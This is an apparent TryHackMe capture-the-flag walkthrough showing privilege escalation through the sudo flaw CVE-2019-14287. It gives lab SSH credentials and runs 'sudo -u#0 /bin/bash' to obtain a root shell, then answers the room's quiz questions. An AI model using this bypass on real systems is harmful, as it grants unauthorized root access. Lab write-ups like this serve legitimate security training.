- Let's ssh to the machine
ssh -p 2222 tryhackme@10.10.114.224
password istryhackme
sudo -l
sends back to us the requirement to exploitCVE-2019-14287
- Following the example shown we could try to use this trick
sudo -u#0 <command>
and put /bin/bash as the command and it works!
What command are you allowed to run with sudo?
Answer/bin/bash
What is the flag in /root/root.txt?
I will let you answer this on your own you will need tocat /root/root.txt